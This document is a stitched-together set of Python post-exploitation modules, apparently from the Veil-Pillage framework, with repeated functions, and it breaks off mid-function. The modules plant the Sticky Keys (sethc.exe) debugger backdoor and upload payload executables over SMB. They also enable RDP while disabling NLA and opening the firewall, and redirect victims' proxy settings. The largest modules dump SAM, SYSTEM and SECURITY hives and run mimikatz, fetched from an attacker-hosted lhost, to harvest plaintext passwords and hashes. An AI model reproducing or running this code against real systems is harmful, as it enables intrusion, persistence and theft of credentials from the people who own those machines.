self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n"
else:
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# command to invoke finddllhijack and output it to a temporary file
exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
cmd = "C:\\Windows\\Temp\\finddllhijack.exe"
for target in self.targets:
# upload the binary to the host at C:\Windows\Temp\
smb.uploadFile(target, username, password, "C$",
"\\Windows\\Temp\\", exePath)
# execute finddllhijack and get the results
out = command_methods.executeResult(target,
username,
password,
cmd,
triggerMethod,
pause=5)
# cleanup
command_methods.executeCommand(
target, username, password,
"del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target,
"finddllhijack.txt", out)
if out != "":
self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# kill all powershell processes
killCMD = "taskkill /f /im powershell.exe"
for target in self.targets:
# execute the command on the host and get the output
out = command_methods.executeResult(target,
username,
password,
killCMD,
triggerMethod=triggerMethod)
if "SUCCESS" in out:
self.output += "[*] Powershell processes terminated using creds '" + username + ":" + password + "' on " + target + "\n"
else:
self.output += "[*] Powershell processes failed to terminate using creds '" + username + ":" + password + "' on " + target + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
for target in self.targets:
print " [*] Doing soemthing on %s" % (target)
command = "something to do on the host"
# ...
result = command_methods.executeResult(
target, username, password, command,
self.required_options["trigger_method"][0])
# check our output and write output/cleanup as appropriate
if "something" in result:
self.output += "action successful on " + target + "\n"
# this needs to be tab-separated, check a module for examples
self.cleanup += "cleanup command " + target + "\n"
# finally return our putput and cleanup text
return (self.output, self.cleanup)
def run(self):
# assume single set of credentials (take the first one)
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# the registry command to set up the sethc stickkeys backdoor
sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\System32\\cmd.exe\""
# execute the sethc command and get the result
sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)
if sethcResult == "":
self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
elif "The operation completed successfully" in sethcResult:
self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"
# build our cleanup -> deleting this registry run value
cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
def run(self):
# assume single set of credentials (take the first one)
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# the registry command to set up the sethc stickkeys backdoor
sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\System32\\cmd.exe\""
# execute the sethc command and get the result
sethcResult = command_methods.executeResult(
target, username, password, sethcCommand, triggerMethod)
if sethcResult == "":
self.output += "[!] No result file, SETHC backdoor enable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "The operation completed successfully" in sethcResult:
self.output += "[*] SETHC backdoor successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
# build our cleanup -> deleting this registry run value
cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# reg.exe command to detect if powershell is installed
command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
result = command_methods.executeResult(target, username, password, command, triggerMethod)
if result.startswith("error:"):
self.output += "[!] Error '"+result+"' in detecting powershell using creds '"+username+":"+password+"' on : " + target + "\n"
elif result == "":
self.output += "[!] No result file, detect PowerShell failed using creds '"+username+":"+password+"' on : " + target + "\n"
elif "0x1" in result:
self.output += "[*] PowerShell detected using creds '"+username+":"+password+"' on : " + target + "\n"
elif "0x0" in result:
self.output += "[*] PowerShell not detected using creds '"+username+":"+password+"' on : " + target + "\n"
else:
print "result:",result
self.output += "[!] Error in detecting PowerShell using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
uploadName = self.required_options["upload_name"][0]
# if we're using Veil-Evasion for payload generation
if self.required_options["exe_path"][0].lower() == "veil":
# create a Veil-Evasion controller object for payload generation
con = controller.Controller()
# check various possibly flags passed by the command line
# if we don't have payload specified, jump to the main controller menu
if not self.args.p:
payloadPath = con.MainMenu()
# otherwise, set all the appropriate payload options
else:
# pull out any required options from the command line and
# build the proper dictionary so we can set the payload manually
options = {}
if self.args.c:
options['required_options'] = {}
for option in self.args.c:
name,value = option.split("=")
options['required_options'][name] = [value, ""]
# pull out any msfvenom shellcode specification and msfvenom options
if self.args.msfpayload:
options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]
# manually set the payload in the controller object
con.SetPayload(self.args.p, options)
# generate the payload code
code = con.GeneratePayload()
# grab the generated payload .exe name
payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)
# nicely print the title and module name again (since Veil-Evasion trashes this)
messages.title()
print " [*] Executing module: " + helpers.color(self.name) + "..."
# sanity check if the user exited Veil-Evasion execution
if not payloadPath or payloadPath == "":
print helpers.color(" [!] No output from Veil-Evasion", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we have a custom-specified .exe, use that instead
else:
payloadPath = self.required_options["exe_path"][0]
# if the .exe path doesn't exist, print and error and return
if not os.path.exists(payloadPath):
print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# make sure the name ends with ".exe"
if not uploadName.endswith(".exe"):
uploadName += ".exe"
# copy the resulting binary into the temporary directory with the appropriate name
os.system("cp "+payloadPath+" /tmp/"+uploadName)
for target in self.targets:
baseName = payloadPath.split("/")[-1]
# upload the payload to C:\Windows\System32\
smb.uploadFile(target, username, password, "C$", "\\Windows\\","/tmp/"+uploadName)
self.output += "[*] Binary '"+baseName+"' uploaded to C:\\Windows\\"+uploadName+" using creds '"+username+":"+password+"' on : " + target + "\n"
# the registry command to set up the sethc stickkeys backdoor for the binary
sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\"+uploadName+"\""
# execute the sethc command and get the result
sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)
if sethcResult == "":
self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
elif "The operation completed successfully" in sethcResult:
self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"
# build our cleanup -> deleting this registry run value
cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
lhost = self.required_options["lhost"][0]
use_ssl = self.required_options["use_ssl"][0]
force_method = self.required_options["force_method"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# let's keep track of all credentials found
allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []
for target in self.targets:
powershellInstalled = False
# check if we're forcing a particular grab method
if force_method.lower() == "binary":
powershellInstalled = False
elif force_method.lower() == "powershell":
powershellInstalled = True
else:
# check if we have a functional Powershell installation
powershellCommand = 'powershell.exe -c "$a=42;$a"'
powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
if powershellResult.strip() == "42":
powershellInstalled = True
if powershellInstalled:
# do powersploit combined file of invoke-mimikatz and powerdump
print helpers.color("\n [*] Powershell installed on " + target)
self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"
# the temporary output file we will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# path to the combined Invoke-Mimikatz/powerdump powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"
# trigger the powershell download on just this target
delivery_methods.powershellHostTrigger(
target,
username,
password,
secondStagePath,
lhost,
"",
triggerMethod="winexe",
outFile=out_file,
ssl=use_ssl,
noArch=True,
)
print "\n [*] Waiting " + delay + "s for Autograb to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# parse the powerdump component
hashes = helpers.parseHashdump(out)
allhashes.extend(hashes)
if out != "":
self.output += (
"[*] Autograb.ps1 results using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " stored at "
+ saveFile
+ "\n"
)
else:
self.output += (
"[!] Autograb.ps1 failed using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " : no result file\n"
)
else:
# do reg.exe for hashdump and host/execute for mimikatz
print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target)
self.output += "[!] Powershell not installed on " + target + "\n"
# reg.exe command to save off the hives
regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
# execute the registry save command
command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")
print helpers.color("\n [*] Dumping hashes on " + target)
# sleep for 5 seconds to let everything backup
time.sleep(5)
# grab all of the backed up files
systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)
# more error-checking here?
if systemFile == "":
self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open("/tmp/system", "w")
f.write(systemFile)
f.close()
if securityFile == "":
self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open("/tmp/security", "w")
f.write(securityFile)
f.close()
if samFile == "":
self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open("/tmp/sam", "w")
f.write(samFile)
f.close()
# get all the hashes from these hives
out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
# save the output file off
saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
self.output += (
"[*] dumped hashes (reg.exe) using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " saved to "
+ saveLocation
+ "\n"
)
# save these off to the universal list
hashes = helpers.parseHashdump(out)
allhashes.extend(hashes)
# now, detect the architecture
archCommand = "echo %PROCESSOR_ARCHITECTURE%"
archResult = command_methods.executeResult(target, username, password, archCommand, "wmis")
arch = "x86"
if "64" in archResult:
arch = "x64"
# now time for ze mimikatz!
mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
# the temporary output file we will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file
# host mimikatz.exe and trigger it ONLY on this particular machine
# so we can get the architecture correct
delivery_methods.hostTrigger(
target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs
)
print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
if out != "":
self.output += (
"[*] Mimikatz results using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " stored at "
+ saveFile
+ "\n"
)
else:
self.output += (
"[!] Mimikatz failed using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " : no result file\n"
)
if len(allhashes) > 0:
allhashes = sorted(set(allhashes))
self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"
if len(allmsv) > 0:
allmsv = sorted(set(allmsv))
self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
if len(allkerberos) > 0:
allkerberos = sorted(set(allkerberos))
self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
if len(allwdigest) > 0:
allwdigest = sorted(set(allwdigest))
self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
if len(alltspkg) > 0:
alltspkg = sorted(set(alltspkg))
self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
# assume single set of credentials (take the first one)
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# enable RDP command
rdpCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
# cleanup RDP command
rdpCleanupCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'
# Disable NLA command
nlaCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'
# Firewall exception command
firewallCMD = "netsh firewall set service type = remotedesktop mod = enable"
for target in self.targets:
# execute the RDP enable command and get the result
rdpResult = command_methods.executeResult(target, username, password, rdpCMD, triggerMethod)
if rdpResult == "":
self.output += (
"[!] No result file, RDP enable failed using creds '"
+ username
+ ":"
+ password
+ "' on : "
+ target
+ "\n"
)
elif "The operation completed successfully" in rdpResult:
self.output += (
"[*] RDP successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
)
# our cleanup is to execute the RDP disable command
self.cleanup += (
"executeCommand|"
+ target
+ "|"
+ username
+ "|"
+ password
+ "|"
+ rdpCleanupCMD
+ "|"
+ triggerMethod
+ "\n"
)
# if we succeed here, keep going...
# execute the disable NLA command
nlaResult = command_methods.executeResult(target, username, password, nlaCMD, triggerMethod)
if nlaResult == "":
self.output += (
"[!] No result file, NLA disable failed using creds '"
+ username
+ ":"
+ password
+ "' on : "
+ target
+ "\n"
)
elif "The operation completed successfully" in nlaResult:
self.output += (
"[*] NLA successfully disabled using creds '"
+ username
+ ":"
+ password
+ "' on : "
+ target
+ "\n"
)
# more success, keep going again...
# execute the firewall exception command
firewallResult = command_methods.executeResult(
target, username, password, firewallCMD, triggerMethod
)
if firewallResult == "":
self.output += (
"[!] No result file, firewall exeception failed using creds '"
+ username
+ ":"
+ password
+ "' on : "
+ target
+ "\n"
)
elif "executed successfully" in firewallResult:
self.output += (
"[*] Firewall exception successfully enabled using creds '"
+ username
+ ":"
+ password
+ "' on : "
+ target
+ "\n"
)
else:
self.output += (
"[!] Error in enabling firewall exception using creds '"
+ username
+ ":"
+ password
+ "' on : "
+ target
+ "\n"
)
else:
self.output += (
"[!] Error in disabling NLA using creds '"
+ username
+ ":"
+ password
+ "' on : "
+ target
+ "\n"
)
else:
self.output += (
"[!] Error in enabling RDP using creds '" + username + ":" + password + "' on : " + target + "\n"
)
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options['trigger_method'][0]
proxyUrl = self.required_options['proxy_url'][0]
proxyCheckCmd = "reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable"
proxyCheckServerCmd = "reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer"
proxyEnableCmd = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /t REG_DWORD /d 1 /f"
proxySetCmd = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d %s /f" % (
proxyUrl)
proxy = ""
for target in self.targets:
self.output += "[*] Checking proxy settings on %s" % (target)
results = command_methods.executeResult(target, username, password,
proxyCheckCmd,
triggerMethod)
if results == "":
self.output += "\n[!] No result file, Proxy enable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "ProxyEnable" not in results:
self.output += "\n[*] Proxy has never been set on " + target
self.output += "\n[*] Enabling system proxy"
enable_results = command_methods.executeResult(
target, username, password, proxyEnableCmd, triggerMethod)
if "The operation completed successfully" in enable_results:
self.output += "\n[*] Proxy successfully enabled on " + target
self.output += "\n[*] Setting proxy server"
set_results = command_methods.executeResult(
target, username, password, proxySetCmd, triggerMethod)
if "The operation completed successfully" in set_results:
self.output += "\n[*] Proxy address successfully set to %s on %s" % (
proxyUrl, target)
cleanupCMD = "reg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /f && reg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /f"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
elif "0x0" in results:
server_results = command_methods.executeResult(
target, username, password, proxyCheckServerCmd,
triggerMethod)
proxy = ""
for res in server_results.split(" "):
r = re.findall(r".+:[0-9]{1,5}", res)
if r:
proxy = r[0]
if proxy == "":
self.output += "\n[*] Proxy has been disabled on %s" % (
target)
else:
self.output += "\n[*] Proxy has been disabled but set to %s on %s" % (
proxy, target)
self.output += "\n[*] Enabling proxy"
enable_results = command_methods.executeResult(
target, username, password, proxyEnableCmd, triggerMethod)
if "The operation completed successfully" in enable_results:
self.output += "\n[*] Proxy successfully enabled on " + target
self.output += "\n[*] Setting proxy server"
set_results = command_methods.executeResult(
target, username, password, proxySetCmd, triggerMethod)
if "The operation completed successfully" in set_results:
self.output += "\n[*] Proxy address successfully set to %s on %s" % (
proxyUrl, target)
cleanupCMD = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /t REG_DWORD /d 0 /f && reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d \"%s\" /f" % proxy
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
elif "0x1" in results:
server_results = command_methods.executeResult(
target, username, password, proxyCheckServerCmd,
triggerMethod)
proxy = ""
for res in server_results.split(" "):
r = re.findall(r".+:[0-9]{1,5}", res)
if r:
proxy = r[0]
if proxy == "":
self.output += "\n[*] Proxy already enabled on %s" % (
target)
else:
self.output += "\n[*] Proxy already enabled and set to %s on %s" % (
proxy, target)
self.output += "\n[*] Setting proxy server on " + target
set_results = command_methods.executeResult(
target, username, password, proxySetCmd, triggerMethod)
if "The operation completed successfully" in set_results:
self.output += "\n[*] Proxy address successfully set to %s on %s" % (
proxyUrl, target)
cleanupCMD = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d \"%s\" /f" % proxy
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
else:
self.output += "\n[!] Got unexpected output: %s" % results
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
proxyUrl = self.required_options["proxy_url"][0]
proxyCheckCmd = (
'reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable'
)
proxyCheckServerCmd = (
'reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer'
)
proxyEnableCmd = 'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f'
proxySetCmd = (
'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d %s /f'
% (proxyUrl)
)
proxy = ""
for target in self.targets:
self.output += "[*] Checking proxy settings on %s" % (target)
results = command_methods.executeResult(target, username, password, proxyCheckCmd, triggerMethod)
if results == "":
self.output += (
"\n[!] No result file, Proxy enable failed using creds '"
+ username
+ ":"
+ password
+ "' on : "
+ target
+ "\n"
)
elif "ProxyEnable" not in results:
self.output += "\n[*] Proxy has never been set on " + target
self.output += "\n[*] Enabling system proxy"
enable_results = command_methods.executeResult(
target, username, password, proxyEnableCmd, triggerMethod
)
if "The operation completed successfully" in enable_results:
self.output += "\n[*] Proxy successfully enabled on " + target
self.output += "\n[*] Setting proxy server"
set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)
if "The operation completed successfully" in set_results:
self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)
cleanupCMD = 'reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /f && reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /f'
self.cleanup += (
"executeCommand|"
+ target
+ "|"
+ username
+ "|"
+ password
+ "|"
+ cleanupCMD
+ "|"
+ triggerMethod
+ "\n"
)
elif "0x0" in results:
server_results = command_methods.executeResult(
target, username, password, proxyCheckServerCmd, triggerMethod
)
proxy = ""
for res in server_results.split(" "):
r = re.findall(r".+:[0-9]{1,5}", res)
if r:
proxy = r[0]
if proxy == "":
self.output += "\n[*] Proxy has been disabled on %s" % (target)
else:
self.output += "\n[*] Proxy has been disabled but set to %s on %s" % (proxy, target)
self.output += "\n[*] Enabling proxy"
enable_results = command_methods.executeResult(
target, username, password, proxyEnableCmd, triggerMethod
)
if "The operation completed successfully" in enable_results:
self.output += "\n[*] Proxy successfully enabled on " + target
self.output += "\n[*] Setting proxy server"
set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)
if "The operation completed successfully" in set_results:
self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)
cleanupCMD = (
'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f && reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d "%s" /f'
% proxy
)
self.cleanup += (
"executeCommand|"
+ target
+ "|"
+ username
+ "|"
+ password
+ "|"
+ cleanupCMD
+ "|"
+ triggerMethod
+ "\n"
)
elif "0x1" in results:
server_results = command_methods.executeResult(
target, username, password, proxyCheckServerCmd, triggerMethod
)
proxy = ""
for res in server_results.split(" "):
r = re.findall(r".+:[0-9]{1,5}", res)
if r:
proxy = r[0]
if proxy == "":
self.output += "\n[*] Proxy already enabled on %s" % (target)
else:
self.output += "\n[*] Proxy already enabled and set to %s on %s" % (proxy, target)
self.output += "\n[*] Setting proxy server on " + target
set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)
if "The operation completed successfully" in set_results:
self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)
cleanupCMD = (
'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d "%s" /f'
% proxy
)
self.cleanup += (
"executeCommand|"
+ target
+ "|"
+ username
+ "|"
+ password
+ "|"
+ cleanupCMD
+ "|"
+ triggerMethod
+ "\n"
)
else:
self.output += "\n[!] Got unexpected output: %s" % results
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
lhost = self.required_options["lhost"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# the temporary output file gpp-password will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# let's keep track of ALL plaintext credentials found
allmsv, allkerberos, allwdigest, alltspkg = [], [], [], []
for target in self.targets:
print "\n [*] Executing mimikatz on " + target
# first, detect the architecture
archCommand = "echo %PROCESSOR_ARCHITECTURE%"
archResult = command_methods.executeResult(target, username,
password, archCommand,
triggerMethod)
# if there's a failure in this initial execution, go to the next target
if "error" in archResult:
self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n"
continue
arch = "x86"
if "64" in archResult: arch = "x64"
exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file
# now time for mimikatz!
mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
# host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
delivery_methods.hostTrigger(target,
username,
password,
mimikatzPath,
lhost,
triggerMethod=triggerMethod,
exeArgs=exeArgs)
print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
out)
if out != "":
self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
# append the total mimikatz creds if we have any
if len(allmsv) > 0:
allmsv = sorted(set(allmsv))
self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
if len(allkerberos) > 0:
allkerberos = sorted(set(allkerberos))
self.output += "[*] All kerberos:\n\t" + "\n\t".join(
allkerberos) + "\n"
if len(allwdigest) > 0:
allwdigest = sorted(set(allwdigest))
self.output += "[*] All wdigest:\n\t" + "\n\t".join(
allwdigest) + "\n"
if len(alltspkg) > 0:
alltspkg = sorted(set(alltspkg))
self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
uploadName = self.required_options["upload_name"][0]
key_name = self.required_options["key_name"][0]
# if we're using Veil-Evasion for payload generation
if self.required_options["exe_path"][0].lower() == "veil":
# create a Veil-Evasion controller object for payload generation
con = controller.Controller()
# if we don't have payload specified, jump to the main controller menu
if not self.args.p:
payloadPath = con.MainMenu()
# otherwise, set all the appropriate payload options
else:
# pull out any required options from the command line and
# build the proper dictionary so we can set the payload manually
options = {}
if self.args.c:
options['required_options'] = {}
for option in self.args.c:
name, value = option.split("=")
options['required_options'][name] = [value, ""]
# pull out any msfvenom shellcode specification and msfvenom options
if self.args.msfpayload:
options['msfvenom'] = [
self.args.msfpayload, self.args.msfoptions
]
# manually set the payload in the controller object
con.SetPayload(self.args.p, options)
# generate the payload code
code = con.GeneratePayload()
# grab the generated payload .exe name
payloadPath = con.OutputMenu(con.payload,
code,
showTitle=True,
interactive=False)
# nicely print the title and module name again (since Veil-Evasion trashes this)
messages.title()
print " [*] Executing module: " + helpers.color(self.name) + "..."
# sanity check if the user exited Veil-Evasion execution
if not payloadPath or payloadPath == "":
print helpers.color(" [!] No output from Veil-Evasion",
warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we have a custom-specified .exe, use that instead
else:
payloadPath = self.required_options["exe_path"][0]
# if the .exe path doesn't exist, print and error and return
if not os.path.exists(payloadPath):
print helpers.color("\n\n [!] Invalid .exe path specified",
warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# make sure the name ends with ".exe"
if not uploadName.endswith(".exe"):
uploadName += ".exe"
# copy the resulting binary into the temporary directory with the appropriate name
os.system("cp " + payloadPath + " /tmp/" + uploadName)
for target in self.targets:
baseName = payloadPath.split("/")[-1]
# upload the payload to C:\Windows\System32\
smb.uploadFile(target, username, password, "C$", "\\Windows\\",
"/tmp/" + uploadName)
self.output += "[*] Binary '" + baseName + "' uploaded to C:\\Windows\\" + uploadName + " using creds '" + username + ":" + password + "' on : " + target + "\n"
# the registry command to set up the sethc stickkeys backdoor for the binary
